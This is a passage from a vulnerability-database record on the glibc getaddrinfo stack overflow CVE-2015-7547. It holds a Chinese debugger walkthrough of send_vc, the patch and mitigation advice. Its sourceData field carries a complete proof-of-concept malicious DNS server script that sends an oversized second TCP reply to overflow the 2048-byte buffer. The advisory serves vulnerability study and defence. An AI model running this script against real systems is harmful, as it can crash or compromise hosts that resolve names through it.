resplen2=0xbfffeb78, ansp2_malloced=0xbfffeb7c) at res_send.c:669\r\n669\tres_send.c: No such file or directory.\r\n```\r\n\r\n\u8fde\u63a5\u540e\uff0c\u6211\u4eec\u7ee7\u7eed\u5355\u6b65\u8ddf\u8fdb\uff0cpoc\u7aef\u6536\u5230\u4e86tcp\u7684\u8bf7\u6c42\uff0c\u540c\u65f6\uff0cglibc\u63a5\u6536\u5230\u4e86\u7578\u5f62\u5b57\u7b26\u4e32\uff0c\u901a\u8fc7read\u51fd\u6570\u8bfb\u53d6\uff0c\u6211\u4eec\u53ef\u4ee5\u6765\u89c2\u5bdf\u4e00\u4e0b\u8bfb\u53d6\u524d\u540e\u7684\u60c5\u51b5\uff0c\u5728\u6b64\u4e4b\u524d\uff0c\u6211\u4eec\u901a\u8fc7bt\u89c2\u5bdf\u4e00\u4e0b\u67d0\u4e2a\u4e4b\u524d\u63d0\u5230\u7684\u91cd\u70b9\u53d8\u91cf\uff0c\u5c31\u662f\u4fdd\u5b58\u4e862048\u7f13\u51b2\u533a\u7684\u91cd\u70b9\u53d8\u91cf\u3002\r\n\r\n```\r\ngdb-peda$ bt\r\n#0 send_vc (statp=0xb7fd6340 <_res@GLIBC_2.0>, buf=0xbfffd740 \"\\274\\206\\001\", \r\n buflen=0x24, buf2=0xbfffd764 \"\\264\\316\\001\", buflen2=0x24, \r\n ansp=0xbfffd65c, anssizp=0xbfffd728, terrno=0xbfffd668, ns=0x0, \r\n anscp=0xbfffeb6c, ansp2=0xbfffeb70, anssizp2=0xbfffeb74, \r\n resplen2=0xbfffeb78, ansp2_malloced=0xbfffeb7c) at 
res_send.c:669\r\n#1 0xb7df3c4e in __libc_res_nsend (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n buf=0xbfffd740 \"\\274\\206\\001\", buflen=0x24, \r\n buf2=0xbfffd764 \"\\264\\316\\001\", buflen2=0x24, ans=0xbfffe340 \"\", \r\n anssiz=0x10000, ansp=0xbfffeb6c, ansp2=0xbfffeb70, nansp2=0xbfffeb74, \r\n resplen2=0xbfffeb78, ansp2_malloced=0xbfffeb7c) at res_send.c:554\r\n#2 0xb7df191b in __GI___libc_res_nquery (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=0x8048653 \"foo.bar.google.com\", class=0x1, type=0xf371, \r\n answer=0xbfffe340 \"\", anslen=0x800, answerp=0xbfffeb6c, \r\n answerp2=0xbfffeb70, nanswerp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n answerp2_malloced=0xbfffeb7c) at res_query.c:227\r\n#3 0xb7df1fa1 in __libc_res_nquerydomain (\r\n statp=statp@entry=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=name@entry=0x8048653 \"foo.bar.google.com\", domain=0x0, class=0x1, \r\n type=0xf371, answer=0xbfffe340 \"\", anslen=0x800, answerp=0xbfffeb6c, \r\n answerp2=0xbfffeb70, nanswerp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n answerp2_malloced=0xbfffeb7c) at res_query.c:594\r\n#4 0xb7df24cb in __GI___libc_res_nsearch (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=0x8048653 \"foo.bar.google.com\", class=0x1, type=0xf371, \r\n answer=0xbfffe340 \"\", anslen=0x800, answerp=0xbfffeb6c, \r\n answerp2=0xbfffeb70, nanswerp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n answerp2_malloced=0xbfffeb7c) at 
res_query.c:381\r\n```\r\n\r\n\u8fd9\u91cc\u6211\u4eec\u8981\u597d\u597d\u5206\u6790\u4e00\u4e0b\uff0c\u9996\u5148\u662f#4\u5904\u7684answer\uff0c\u5730\u5740\u662f0xbfffe340\uff0c\u4e4b\u524d\u6211\u4eec\u63d0\u5230\u8fc7\uff0c\u8fd9\u91cc\u65f6\u5f00\u8f9f\u76842048\u957f\u5ea6\u5730\u5740\u7684\u7f13\u51b2\u533a\uff0c\u540e\u9762\u7684anslen=0x800\u4e5f\u662f\u957f\u5ea6\uff0c2048\uff0c\u63a5\u4e0b\u6765\u5728#3\u4e2d\uff0canswer\u5730\u5740\u6ca1\u6709\u53d8\u5316\u7ee7\u7eed\u4f20\u9012\uff0c\u63a5\u4e0b\u6765\u5728res_nquery\u4e2d\uff0c\u4f9d\u7136\u6ca1\u6709\u53d8\u5316\uff0c\u6700\u540e\u5230\u8fbe\u5173\u952e\u51fd\u6570send_vc\u7684\u65f6\u5019\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230ansp=0xbfffd65c\uff0c\u8fd9\u4e2a\u5730\u5740\u975e\u5e38\u6709\u610f\u601d\uff0c\u9996\u5148\u5728\u51fd\u6570\u5165\u53e3\u5904\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u5730\u5740\u7684\u4e2d\u5b58\u653e\u7684\u503c\u3002\r\n\r\n```\r\ngdb-peda$ x/10x 0xbfffd65c\r\n0xbfffd65c:\t0xbfffe340\t0xbfffd764\t0xbfffd770\t0x0000006e\r\n0xbfffd66c:\t0x000009e8\t0x56cd507c\t0x1d20b5f8\t0x00000003\r\n0xbfffd67c:\t0x00010001\t0xbfffd740\r\n```\r\n\r\n\u8fd8\u662f0xbfffe340\uff0c\u90a3\u4e48\u8fd9\u4e2a\u5730\u5740\u5f88\u6709\u53ef\u80fd\u662f\u5730\u5740\u6307\u9488\u7684\u6307\u9488\uff0c\u4e5f\u5c31\u662f\u7c7b\u4f3c\u4e8e**ansp\u8fd9\u6837\u7684\u5f62\u5f0f\uff01\u63a5\u4e0b\u6765\u8fd9\u4e2a\u503c\u662f\u5982\u4f55\u4f20\u9012\u7684\u5462\uff0c\u6211\u4eec\u53ef\u4ee5\u5206\u6790\u4e00\u4e0b\u3002\u8bf7\u6ce8\u610f\u6211\u5355\u884c\u7684\u6ce8\u91ca\u3002\r\n\r\n\r\n```\r\nstatic int\r\nsend_vc(res_state statp,\r\n\tconst u_char *buf, int buflen, const u_char *buf2, int buflen2,\r\n\tu_char **ansp, int *anssizp,//ansp\u662f2048\u7f13\u51b2\u533a\u5bf9\u5e94\u5730\u5740\r\n\tint *terrno, int ns, u_char **anscp, u_char **ansp2, int *anssizp2,\r\n\tint *resplen2, int *ansp2_malloced)\r\n{\r\n\tconst HEADER *hp = (HEADER *) buf;\r\n\tconst HEADER *hp2 = (HEADER 
*) buf2;\r\n\tu_char *ans = *ansp;//\u5bf9\u5e94\u5730\u5740\u7684\u4f20\u9012\r\n\tint orig_anssizp = *anssizp;\r\n\t// XXX REMOVE\r\n\t// int anssiz = *anssizp;\r\n\tHEADER *anhp = (HEADER *) ans;\r\n\u2026\u2026\r\n\u2026\u2026\r\n\tif (statp->_vcsock < 0 || (statp->_flags & RES_F_VC) == 0) {\r\n\t\tif (statp->_vcsock >= 0)\r\n\t\t __res_iclose(statp, false);\r\n//\u8fd9\u91cc\u5efa\u7acbsocket\u8fde\u63a5\r\n\t\tstatp->_vcsock = socket(nsap->sin6_family, SOCK_STREAM, 0);\r\n\t\tif (statp->_vcsock < 0) {\r\n\t\t\t*terrno = errno;\r\n\t\t\tPerror(statp, stderr, \"socket(vc)\", errno);\r\n\t\t\treturn (-1);\r\n\t\t}\r\n\t\t__set_errno (0);\r\n//connect\u64cd\u4f5c\uff0c\u5ba2\u6237\u7aef\u4f1a\u63d0\u793aconnect 127.0.0.1\r\n\t\tif (connect(statp->_vcsock, (struct sockaddr *)nsap,\r\n\t\t\t nsap->sin6_family == AF_INET\r\n\t\t\t ? sizeof (struct sockaddr_in)\r\n\t\t\t : sizeof (struct sockaddr_in6)) < 0) {\r\n\t\t\t*terrno = errno;\r\n\t\t\tAerror(statp, stderr, \"connect/vc\", errno,\r\n\t\t\t (struct sockaddr *) nsap);\r\n\t\t\t__res_iclose(statp, false);\r\n\t\t\treturn (0);\r\n\t\t}\r\n\t\tstatp->_flags |= RES_F_VC;\r\n\t}\r\n\r\n\t/*\u53d1\u9001\u90e8\u5206\uff0c\u65e0\u5173\u7d27\u8981\r\n\t * Send length & message\r\n\t */\r\n\u2026\u2026\r\n\t/*\u63a5\u6536\u90e8\u5206\r\n\t * Receive length & response\r\n\t */\r\n\tint recvresp1 = 0;\r\n\tint recvresp2 = buf2 == NULL;\r\n\tuint16_t rlen16;\r\n read_len:\r\n\tcp = (u_char *)&rlen16;\r\n\tlen = sizeof(rlen16);\r\n\twhile ((n = TEMP_FAILURE_RETRY (read(statp->_vcsock, cp,\r\n\t\t\t\t\t (int)len))) > 0) {\r\n\t\tcp += n;\r\n\t\tif ((len -= n) <= 0)\r\n\t\t\tbreak;\r\n\t}\r\n\tif (n <= 0) {\r\n\t\t*terrno = errno;\r\n\t\tPerror(statp, stderr, \"read failed\", errno);\r\n\t\t__res_iclose(statp, false);\r\n\t\t/*\r\n\t\t * A long running process might get its TCP\r\n\t\t * connection reset if the remote server was\r\n\t\t * restarted. Requery the server instead of\r\n\t\t * trying a new one. 
When there is only one\r\n\t\t * server, this means that a query might work\r\n\t\t * instead of failing. We only allow one reset\r\n\t\t * per query to prevent looping.\r\n\t\t */\r\n\t\tif (*terrno == ECONNRESET && !connreset) {\r\n\t\t\tconnreset = 1;\r\n\t\t\tgoto same_ns;\r\n\t\t}\r\n\t\treturn (0);\r\n\t}\r\n\tint rlen = ntohs (rlen16);\r\n\r\n\tint *thisanssizp;\r\n\tu_char **thisansp;\r\n\tint *thisresplenp;\r\n\tif ((recvresp1 | recvresp2) == 0 || buf2 == NULL) {\r\n\u2026\u2026//\u7b2c\u4e00\u6b21\u6536\u5230\uff0c\u65e0\u5173\u7d27\u8981\uff0c\u7b2c\u4e8c\u6b21\u6536\u5230\u5c06\u8fdb\u5165\u4e0b\u9762\u7684else\u90e8\u5206\r\n\t} else {\r\n\t\tif (*anssizp != MAXPACKET) {\r\n\u2026\u2026\r\n\t\t} else {\r\n\t\t\t/* The first reply did not fit into the\r\n\t\t\t user-provided buffer. Maybe the second\r\n\t\t\t answer will. */\r\n\t\t\t*anssizp2 = orig_anssizp;\r\n\t\t\t*ansp2 = *ansp;\r\n\t\t}\r\n\r\n\t\tthisanssizp = anssizp2;\r\n\t\tthisansp = ansp2;\r\n\t\t//\u6b64\u65f6ansp2\u4f1a\u8d4b\u503c\u7ed9thisansp\uff0c\u800c\u6b64\u65f6thisansp\u7684\u503c\u662fansp\r\n\t\tthisresplenp = resplen2;\r\n\t}\r\n\u2026\u2026\r\n//\u6b64\u65f6cp\u7684\u5730\u5740\u662fbfffe340\uff0c\u4e5f\u5c31\u662f2048\u5b57\u8282\u7f13\u51b2\u533a\r\n\tcp = *thisansp;\r\n\t\u63a5\u7740read\u53c2\u6570\u4f1a\u8bfb\u53d6\u8fd9\u4e2a\u63a5\u6536\u5230\u7684\u53c2\u6570\uff0c\u7b2c\u4e8c\u6b21\u63a5\u6536\u5230\u65f6\uff0c\u662f\u957f\u5ea6\u4e3a\u8d85\u957f\u7684\u5b57\u7b26\u4e32\uff0c\u800c\u6b64\u65f6\uff0c\u6ca1\u6709\u5bf9\u8fd9\u4e2a\u5b57\u7b26\u4e32\u957f\u5ea6\u8fdb\u884c\u4efb\u4f55\u5224\u65ad\uff01\r\n\twhile (len != 0 && (n = read(statp->_vcsock, (char *)cp, (int)len)) > 0){\r\n\t\tcp += n;\r\n\t\tlen -= 
n;\r\n\t}\r\n```\r\n\r\n\u770b\u5230\u8fd9\u91cc\uff0c\u6211\u4eec\u57fa\u672c\u53ef\u4ee5\u5206\u6790\u51fa\u6765\u4e3a\u4ec0\u4e48PoC\u8981\u53d1\u9001\u4e24\u6b21\uff0c\u800c\u5728\u7b2c\u4e8c\u6b21\u4e2d\uff0c\u52a0\u4e0a\u4e862300\u4e2a'B'\uff0c\u4e5f\u5c31\u662f\u8bf4\u5728\u7b2c\u4e8c\u6b21\u63a5\u6536\u65f6\uff0c2048\u7f13\u51b2\u533a\u5bf9\u5e94\u7684\u53d8\u91cf\u4f1a\u8d4b\u503c\u7ed9\u5373\u5c06\u63a5\u6536\u5b57\u7b26\u4e32\u7684\u7f13\u51b2\u533a\uff0c\u800c\u6b64\u65f6\uff0c\u6ca1\u6709\u5bf9\u8fd9\u4e2a\u7f13\u51b2\u533a\u8981\u63a5\u6536\u5185\u5bb9\u7684\u957f\u5ea6\u8fdb\u884c\u5904\u7406\uff0c\u4ece\u800c\u5bfc\u81f4\u4e86\u8d85\u957f\u4e32\u8986\u76d6\uff0c\u51fd\u6570\u8fd4\u56de\u540e\uff0c\u67d0\u4e2a\u5730\u5740\u88ab\u8986\u76d6\u5bfc\u81f4dns\u8bf7\u6c42\u5d29\u6e83\u3002\r\n\r\n\u63a5\u4e0b\u6765\u6211\u4eec\u53ef\u4ee5\u770b\u4e00\u4e0bread\u524d\u540e\uff0c\u7f13\u51b2\u533a\u7684\u53d8\u5316\u3002\r\n\r\n```\r\ngdb-peda$ n\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x8fe \r\nEBX: 0xb7e01000 --> 0x14ed4 \r\nECX: 0xbfffd65c --> 0xbfffe340 --> 0x0 \r\nEDX: 0x10000 \r\nESI: 0xbfffe340 --> 0x0 \r\nEDI: 0xbfffeb70 --> 0xbfffe340 --> 0x0 \r\nEBP: 0xb7fd6340 --> 0x5 \r\nESP: 0xbfffd2f0 --> 0xb7fd8900 --> 0xb7e36000 --> 0x464c457f \r\nEIP: 0xb7df2eba (<send_vc+1098>:\tmov edi,DWORD PTR [edi])\r\nEFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df2eab <send_vc+1083>:\tmov WORD PTR [esp+0x5e],ax\r\n 0xb7df2eb0 <send_vc+1088>:\tcmp ax,0xb\r\n 0xb7df2eb4 <send_vc+1092>:\tjbe 0xb7df2fbd <send_vc+1357>\r\n=> 0xb7df2eba <send_vc+1098>:\tmov edi,DWORD PTR [edi]\r\n 0xb7df2ebc <send_vc+1100>:\tjmp 0xb7df2ed6 <send_vc+1126>\r\n 0xb7df2ebe <send_vc+1102>:\txchg ax,ax\r\n 0xb7df2ec0 <send_vc+1104>:\tmovzx edx,WORD PTR [esp+0x5e]\r\n 0xb7df2ec5 <send_vc+1109>:\tadd 
edi,eax\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbfffd2f0 --> 0xb7fd8900 --> 0xb7e36000 --> 0x464c457f \r\n0004| 0xbfffd2f4 --> 0xbfffeb74 --> 0x10000 \r\n0008| 0xbfffd2f8 --> 0xbfffeb6c --> 0x804c748 --> 0x80818bf5 \r\n0012| 0xbfffd2fc --> 0xbfffd728 --> 0x10000 \r\n0016| 0xbfffd300 --> 0xbfffeb70 --> 0xbfffe340 --> 0x0 \r\n0020| 0xbfffd304 --> 0x0 \r\n0024| 0xbfffd308 --> 0xbfffeb74 --> 0x10000 \r\n0028| 0xbfffd30c --> 0x1 \r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n883\tin res_send.c\r\ngdb-peda$ n\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x8fe \r\nEBX: 0xb7e01000 --> 0x14ed4 \r\nECX: 0xbfffe340 --> 0x4242bb5e \r\nEDX: 0x8fe \r\nESI: 0xbfffe340 --> 0x4242bb5e \r\nEDI: 0xbfffe340 --> 0x4242bb5e \r\nEBP: 0xb7fd6340 --> 0x5 \r\nESP: 0xbfffd2f0 --> 0xb7fd8900 --> 0xb7e36000 --> 0x464c457f \r\nEIP: 0xb7df2ec0 (<send_vc+1104>:\tmovzx edx,WORD PTR [esp+0x5e])\r\nEFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df2eba <send_vc+1098>:\tmov edi,DWORD PTR [edi]\r\n 0xb7df2ebc <send_vc+1100>:\tjmp 0xb7df2ed6 <send_vc+1126>\r\n 0xb7df2ebe <send_vc+1102>:\txchg ax,ax\r\n=> 0xb7df2ec0 <send_vc+1104>:\tmovzx edx,WORD PTR [esp+0x5e]\r\n 0xb7df2ec5 <send_vc+1109>:\tadd edi,eax\r\n 0xb7df2ec7 <send_vc+1111>:\tsub edx,eax\r\n 0xb7df2ec9 <send_vc+1113>:\tmovzx eax,dx\r\n 0xb7df2ecc <send_vc+1116>:\ttest ax,ax\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbfffd2f0 --> 0xb7fd8900 --> 0xb7e36000 --> 0x464c457f \r\n0004| 0xbfffd2f4 --> 0xbfffeb74 ('B' <repeats 200 times>...)\r\n0008| 0xbfffd2f8 --> 0xbfffeb6c ('B' <repeats 200 times>...)\r\n0012| 0xbfffd2fc --> 0xbfffd728 --> 0x10000 \r\n0016| 0xbfffd300 --> 0xbfffeb70 ('B' <repeats 
200 times>...)\r\n0020| 0xbfffd304 --> 0x0 \r\n0024| 0xbfffd308 --> 0xbfffeb74 ('B' <repeats 200 times>...)\r\n0028| 0xbfffd30c --> 0x1 \r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n886\tin res_send.c\r\n```\r\n\r\n\u6700\u540e\u6211\u4eec\u53ef\u4ee5\u6765\u770b\u4e00\u4e0b\u8865\u4e01\u540e\u7684\u5bf9\u6bd4\r\n\r\n```\r\n\t*thisresplenp = rlen;\r\n\t/* Is the answer buffer too small? */\r\n\tif (*thisanssizp < rlen) {\r\n\t\t/* If the current buffer is not the the static\r\n\t\t user-supplied buffer then we can reallocate\r\n\t\t it. */\r\n\t\tif (thisansp != NULL && thisansp != ansp) {\r\n\t\t\t/* Always allocate MAXPACKET, callers expect\r\n\t\t\t this specific size. */\r\n\t\t\tu_char *newp = malloc (MAXPACKET);\r\n\t\t\tif (newp == NULL) {\r\n\t\t\t\t*terrno = ENOMEM;\r\n\t\t\t\t__res_iclose(statp, false);\r\n\t\t\t\treturn (0);\r\n\t\t\t}\r\n\t\t\t*thisanssizp = MAXPACKET;\r\n\t\t\t*thisansp = newp;\r\n\t\t\tif (thisansp == ansp2)\r\n\t\t\t *ansp2_malloced = 1;\r\n```\r\n\r\n\u53ef\u4ee5\u770b\u5230\uff0c\u5728\u5b98\u65b9\u4fee\u590d\u76842.23\u7248\u672c\u8bf4\u660e\u4e2d\uff0c\u8fd9\u91cc\u5c06\u4e0d\u518d\u91c7\u7528\u9759\u6001\u7f13\u51b2\u533a2048\uff0c\u800c\u662f\u4f1a\u6839\u636e\u7528\u6237\u7533\u8bf7\u7f13\u51b2\u533a\u7684\u5927\u5c0f\u6765\u91cd\u65b0\u5206\u914d\u7f13\u51b2\u533a\u3002\r\n### 5. 
\u6f0f\u6d1e\u68c0\u6d4b\r\n\r\n\u7531\u4e8eglibc 2.9 \u662f\u57282008\u5e74\u53d1\u884c\u7684\uff0c\u6240\u4ee5\u5927\u91cfLinux \u7cfb\u7edf\u90fd\u4f1a\u53d7\u5230\u8be5\u6f0f\u6d1e\u5f71\u54cd\u3002\u82e5\u4e00\u65e6\u7ed5\u8fc7\u5185\u5b58\u9632\u62a4\u6280\u672f\uff0c\u5219\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u6210\u4e3a\u4e00\u5927\u6740\u5668\u3002\u88ab\u52ab\u6301\u7684DNS server\u8fdb\u884c\u4e2d\u95f4\u4eba\u653b\u51fb\uff0c\u53ef\u76f4\u63a5\u6279\u91cf\u83b7\u53d6\u5927\u91cf\u4e3b\u673a\u6743\u9650\u3002\r\n\r\n\u5229\u7528ldd \u547d\u4ee4\u67e5\u770bC \u5e93\u51fd\u6570\u7248\u672c\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\r\n> \u6709\u8da3\u7684\u662f\uff0c\u65e9\u5728\u53bb\u5e74\u76847\u6708\u4efd\uff0c\u5c31\u6709\u7814\u7a76\u4eba\u5458\u516c\u5e03\u4e86\u6709\u5173\u8fd9\u4e00\u6f0f\u6d1e\u7684\u4fe1\u606f\uff0c\u4f46\u5f53\u65f6 \u6b64\u6f0f\u6d1e\u5e76\u6ca1\u6709\u5f97\u5230\u91cd\u89c6\u3002\r\n\r\n\u6839\u636e\u76ee\u524d\u7684\u8c03\u67e5\u60c5\u51b5\u6211\u4eec\u8ba4\u4e3a\u6b64\u6f0f\u6d1e\u7684\u7ea7\u522b\u8be5\u89c6\u4e3a\u9ad8\u5371\u6f0f\u6d1e\uff0cGlibc\u5e94\u7528\u4e8e\u4f17\u591aLinux\u53d1\u884c\u7248\u672c\u4e2d\uff0c\u6240\u4ee5\u6b64\u7c7b\u6f0f\u6d1e\u5f71\u54cd\u8303\u56f4\u5341\u5206\u5e7f\u6cdb\u3002\u8be5\u6f0f\u6d1e\u5f71\u54cdGlibc 2.9\u4ee5\u540e\u7684\u6240\u6709\u7248\u672c\u3002\r\n\r\n### 6. 
\u6f0f\u6d1e\u4fee\u590d\r\n\u5efa\u8bae\u5e7f\u5927\u7528\u6237\u5c3d\u5feb\u7ed9\u64cd\u4f5c\u7cfb\u7edf\u6253\u8865\u4e01\uff0c\u8be5\u6f0f\u6d1e\u5b58\u5728\u4e8eresolv/res_send.c\u6587\u4ef6\u4e2d\uff0c\u5f53getaddrinfo()\u51fd\u6570\u88ab\u8c03\u7528\u65f6\u4f1a\u89e6\u53d1\u8be5\u6f0f\u6d1e\u3002\u6280\u672f\u4eba\u5458\u53ef\u4ee5\u9650\u5236TCP DNS\u54cd\u5e94\u5305\u5b57\u8282\u7684\u5927\u5c0f\uff0c\u5e76\u4e22\u5f03\u8d85\u8fc7512\u5b57\u8282\u7684UDP DNS\u6570\u636e\u5305\u6765\u7f13\u89e3\u8be5\u95ee\u9898\u3002\r\n\r\n\u6709\u8da3\u7684\u662f\uff0c\u65e9\u5728\u53bb\u5e74\u76847\u6708\u4efd\uff0c\u5c31\u6709\u7814\u7a76\u4eba\u5458\u516c\u5e03\u4e86\u6709\u5173\u8fd9\u4e00\u6f0f\u6d1e\u7684\u4fe1\u606f\uff0c\u4f46\u5f53\u65f6 \u6b64\u6f0f\u6d1e\u5e76\u6ca1\u6709\u5f97\u5230\u91cd\u89c6\u3002\u6839\u636e\u76ee\u524d\u7684\u8c03\u67e5\u60c5\u51b5\u6211\u4eec\u8ba4\u4e3a\u6b64\u6f0f\u6d1e\u7684\u7ea7\u522b\u8be5\u89c6\u4e3a\u9ad8\u5371\u6f0f\u6d1e\uff0cglibc\u5e94\u7528\u4e8e\u4f17\u591aLinux\u53d1\u884c\u7248\u672c\u4e2d\uff0c\u6240\u4ee5\u6b64\u7c7b\u6f0f\u6d1e\u5f71\u54cd\u8303\u56f4\u5341\u5206\u5e7f\u6cdb\u3002\u8be5\u6f0f\u6d1e\u5f71\u54cdglibc 2.9\u52302.22\u7684\u6240\u6709\u7248\u672c\u3002\r\n\r\n### 7. \u76f8\u5173\u94fe\u63a5\r\n\r\n1. [CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow](https://googleonlinesecurity.blogspot.jp/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html) \r\n\r\n2. [CVE-2015-7547 \u8865\u4e01](https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html)\r\n\r\n3. 
[\u7d27\u6025\uff01Linux \u5e95\u5c42\u51fd\u6570\u5e93\u201cglibc\u201d\u518d\u73b0\u91cd\u5927\u5b89\u5168\u6f0f\u6d1e\uff01\u591a\u4e2a Linux \u53d1\u884c\u7248\u53d7\u5f71\u54cd](https://mp.weixin.qq.com/s?__biz=MzIwMTQ2NzY4NA==&mid=403076844&idx=1&sn=657ee0d88806c2f1b1c9d8d687aae77a&scene=0&key=710a5d99946419d9b1d0d10b2383538792cf67e29692e00185ec90053e80301f92a83b3ad88bfff9b2ce8b9254db3498&ascene=0&uin=NjY5NjY5MDgw&version=11020201&pass_ticket=SxQNHpTQu%2BemqqSwok9Ncxcx7i7ras3ry108ltQKsj6oDLTthSm%2B6IOpHAad0BG%2B)\r\n\r\n4. [Linux Glibc \u51fd\u6570\u5e93\u6f0f\u6d1e\u5206\u6790(CVE-2015-7547)](http://blog.knownsec.com/2016/02/linux-glibc-cve-2015-7547-analysis/)", "published": "2016-02-17T00:00:00", "type": "seebug", "title": "glibc getaddrinfo \u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e(CVE-2015-7547)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90749", "id": "SSV:90749", "sourceData": "\n #!/usr/bin/python\r\n#\r\n# Copyright 2016 Google Inc\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n#\r\n# Authors: \r\n# Fermin J. 
Serna <fjserna@google.com>\r\n# Gynvael Coldwind <gynvael@google.com>\r\n# Thomas Garnier <thgarnie@google.com>\r\n\r\nimport socket\r\nimport time\r\nimport struct\r\nimport threading\r\n\r\nIP = '127.0.0.1' # Insert your ip for bind() here...\r\nANSWERS1 = 184\r\n\r\nterminate = False\r\nlast_reply = None\r\nreply_now = threading.Event()\r\n\r\n\r\ndef dw(x):\r\n return struct.pack('>H', x)\r\n\r\ndef dd(x):\r\n return struct.pack('>I', x)\r\n\r\ndef dl(x):\r\n return struct.pack('<Q', x)\r\n\r\ndef db(x):\r\n return chr(x)\r\n\r\ndef udp_thread():\r\n global terminate\r\n\r\n # Handle UDP requests\r\n sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_udp.bind((IP, 53))\r\n\r\n reply_counter = 0\r\n counter = -1\r\n\r\n answers = []\r\n\r\n while not terminate:\r\n data, addr = sock_udp.recvfrom(1024)\r\n print '[UDP] Total Data len recv ' + str(len(data))\r\n id_udp = struct.unpack('>H', data[0:2])[0]\r\n query_udp = data[12:]\r\n\r\n # Send truncated flag... 
so it retries over TCP\r\n data = dw(id_udp) # id\r\n data += dw(0x8380) # flags with truncated set\r\n data += dw(1) # questions\r\n data += dw(0) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query_udp # question\r\n data += '\\x00' * 2500 # Need a long DNS response to force malloc \r\n\r\n answers.append((data, addr))\r\n\r\n if len(answers) != 2:\r\n continue\r\n\r\n counter += 1\r\n\r\n if counter % 4 == 2:\r\n answers = answers[::-1]\r\n\r\n time.sleep(0.01)\r\n sock_udp.sendto(*answers.pop(0))\r\n reply_now.wait()\r\n sock_udp.sendto(*answers.pop(0))\r\n\r\n sock_udp.close()\r\n\r\n\r\ndef tcp_thread():\r\n global terminate\r\n counter = -1\r\n\r\n #Open TCP socket\r\n sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_tcp.bind((IP, 53))\r\n sock_tcp.listen(10)\r\n\r\n while not terminate:\r\n conn, addr = sock_tcp.accept()\r\n counter += 1\r\n print 'Connected with ' + addr[0] + ':' + str(addr[1])\r\n\r\n # Read entire packet\r\n data = conn.recv(1024)\r\n print '[TCP] Total Data len recv ' + str(len(data))\r\n\r\n reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])\r\n print '[TCP] Request1 len recv ' + str(reqlen1)\r\n data1 = data[2:2+reqlen1]\r\n id1 = struct.unpack('>H', data1[0:2])[0]\r\n query1 = data[12:]\r\n\r\n # Do we have an extra request?\r\n data2 = None\r\n if len(data) > 2+reqlen1:\r\n reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])\r\n print '[TCP] Request2 len recv ' + str(reqlen2)\r\n data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]\r\n id2 = struct.unpack('>H', data2[0:2])[0]\r\n query2 = data2[12:]\r\n\r\n # Reply them on different packets\r\n data = ''\r\n data += dw(id1) # id\r\n data += dw(0x8180) # flags\r\n data += dw(1) # questions\r\n data += dw(ANSWERS1) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query1 # question\r\n\r\n for i in 
range(ANSWERS1):\r\n answer = dw(0xc00c) # name compressed\r\n answer += dw(1) # type A\r\n answer += dw(1) # class\r\n answer += dd(13) # ttl\r\n answer += dw(4) # data length\r\n answer += 'D' * 4 # data\r\n\r\n data += answer\r\n\r\n data1_reply = dw(len(data)) + data\r\n\r\n if data2:\r\n data = ''\r\n data += dw(id2)\r\n data += 'B' * (2300)\r\n data2_reply = dw(len(data)) + data\r\n else:\r\n data2_reply = None\r\n\r\n reply_now.set()\r\n time.sleep(0.01)\r\n conn.sendall(data1_reply)\r\n time.sleep(0.01)\r\n if data2:\r\n conn.sendall(data2_reply)\r\n\r\n reply_now.clear()\r\n\r\n sock_tcp.shutdown(socket.SHUT_RDWR)\r\n sock_tcp.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n t = threading.Thread(target=udp_thread)\r\n t.daemon = True\r\n t.start()\r\n tcp_thread()\r\n terminate = True\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-90749"}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:20", "bulletinFamily": 